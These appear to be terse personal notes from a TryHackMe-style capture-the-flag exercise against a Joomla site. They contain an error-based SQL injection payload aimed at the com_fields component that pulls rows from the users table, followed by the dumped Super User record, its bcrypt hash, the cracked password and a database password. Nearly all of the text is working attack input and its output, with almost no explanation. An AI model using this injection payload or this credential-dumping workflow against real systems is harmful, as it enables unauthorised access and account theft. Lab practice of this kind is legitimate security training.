10.18.115.106--me
10.10.93.11--target-->0<---


{'option': 'com_fields', 'view': 'fields', 'layout': 'modal', 'list[fullordering]': 'UpdateXML(2, concat(0x3a,(SELECT LENGTH(CONCAT(id,0x7c,name,0x7c,username,0x7c,email,0x7c,password,0x7c,otpKey,0x7c,otep)) FROM fb9j5_users ORDER BY registerDate ASC LIMIT 1,1), 0x3a), 1)', 'dee575a7cdd50c91ba7b0b571a13a1c8': '1'}


[$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']

243279243130243076654f2f4a534668343338394c6c7563345879612e64
6679324d462e625a687a306a564d772e562e64337031326b42745a75746d

BCrypt hash:
$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm

CRACKED!
$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm:spiderman123

DB:
nv5uz9r3ZEDzVjNu
*Maybe search db_user in php file?*







